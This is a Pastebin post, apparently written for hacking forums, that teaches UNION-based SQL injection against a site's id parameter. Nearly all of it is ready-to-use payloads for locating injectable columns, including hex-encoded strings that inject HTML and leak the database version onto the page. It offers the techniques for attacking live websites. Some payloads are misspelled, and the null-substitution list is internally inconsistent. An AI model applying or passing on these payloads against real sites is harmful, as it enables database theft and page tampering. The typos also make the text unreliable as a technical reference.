Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How to find Vulnerable Columns?
- ANS:-
- 1st Technique:-
- use -> id = -1 union select 1,2,3,4,5--
- use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
- use -> id = .1/1.2/12.4 union select 1,2,3,4,5-- [Thanks to Crown sir]
- Note:- I use null and bybysql. Not confuse with them u can use watever u like means use dat things which doesn't exist [Thanks to Hack Forum]
- 2nd Technique :- False Parameter
- Here False Parameter means put something that make a wrong response into our SQL PARAMETER like
- (a) 1=2, 1=0
- use -> id=1 or 1=2 union select 1,2,3,4,5--
- use -> id=1 or 1=0 union select 1,2,3,4,5--
- (b) Also can we use having, like, <>
- use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
- use -> id=1 1 like/LIKE 2 union select 1,2,3,4,5--
- use -> id=1 1 <> 1 union select 1,2,3,4,5--
- use -> id=1 {having/and} 1 like 2 union select 1,2,3,4,5--
- use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5-- /* use either having or and
- (c) Also u can use and false/AND FALSE statement
- use -> id=1 and false union select 1,2,3,4,5--
- 3rd Technique :- Divide by 0 means -> /0 and +div+0
- use -> id =12/0 union select 1,2,3,4,5--
- use -> id = 12+div+0+ union select 1,2,3,4,5--
- 4th Technique :- Look closely, or scratch the HTML source code
- The number can potentially be display anywhere, when it's kind of rough, just change the query to make the whole thing more visible to something like
- http://somesite.net/b.php?id=12/0 union select 1111,2222,3333,4444,5555--
- Above we use 1111 ,2222 instead of 1,2 respectively
- After writing dat code open source code then search the 'Column Number' like 1111,2222,3333,4444,5555 by using (CTRL+F :- For finding something in source code) Then check where is dat number appearing in source code
- Sometimes the number display on the page title.
- When U get the vulnerable columns then u want to display the version,user,database or some html parts to visible on page So 4 dat Follow These Steps :-
- i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
- Where
- 223e => ">
- 3c696d67207372633d22 => <img src="
- *Remeber we use 0x so dat above hex code works
- ii.) 4 print our name
- id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
- Where
- 0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \"><font color = red size=4>AAKASH</font><!--
- 5th Technique :-
- U tried all above technique but stille can't get vulnerable column then u can also use this 5th technique.... Wats new in this technique See :-
- u can use union select 1,2,3,4,5-- as union (select 1,2,3,4,5)--
- use :- id=-2 union (select 1,2,3,4,5)--
- /* If u see vul col like 3 then
- use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--
- 6th Technique :- True Parameter
- use -> id=1 +where+1=1 union select 1,2,3,4,5--
- use -> id=1 +and+50=50 union select 1,2,3,4,5--
- use -> id=1 =75=75 union select 1,2,3,4,5--
- 7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
- Frnds when u can't find number of columns then u also can use this techniue. By this technique not only u find number of columns u also get vulnerable columns.
- Follow the following steps
- 1st do -> union select 1--
- 2nd do -> union select 1,2--
- 3rd do -> union select 1,2,3--
- 4th do -> union slect 1,2,3,4--
- 5th do -> union select 1,2,3,4,5--
- Do dat steps untill we can't get vulnerabls.
- Do above steps untill u cant get vulnerable columns :)
- 8th Techniues :- Guessing which number is vulnerable
- suppose we have union select 1,2,3,4,5,6,7--
- Then replace numbers with any words u want like :-
- union select 'hello1','hello2','hello3','hello4','hello5' [Then convert 'hello1' in hex format] OR
- union select version(),version(),version(),version(),version() [No need to convert] OR
- union select :1,:2,:3,:4,:5,:6 [Then convert :1 in hex format. I think it is very easy to use and not confusing ]
- 9th Techniques:- Using null
- Friends we can also use null to get vulnerable columns.
- See this :-
- union select 1,2,3,4,5,6,7--
- union select null,2,3,4,5,6,7-- Error [But if 1 is vulnerable den no error]
- union selecct 1,null,2,3,4,5,6,7-- Error "
- union select 1,2,null,3,4,5,6,7-- Error "
- union select 1,2,3,null,4,5,6,7-- No Error [Suppose if 4 is vulnerable den no error]
- union select 1,2,3,4,null,5,6,7--
- union select 1,2,3,4,5,null,6,7--
- union select 1,2,3,4,5,null,7--
- union select 1,2,3,4,5,6,null --
- Thanks and credit goes to
- 1. Blackhawk
- 2. Crown
- 3.BlackRoas
- 4.Benzi
- 5.Devilhunter Dante (My Teacher)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement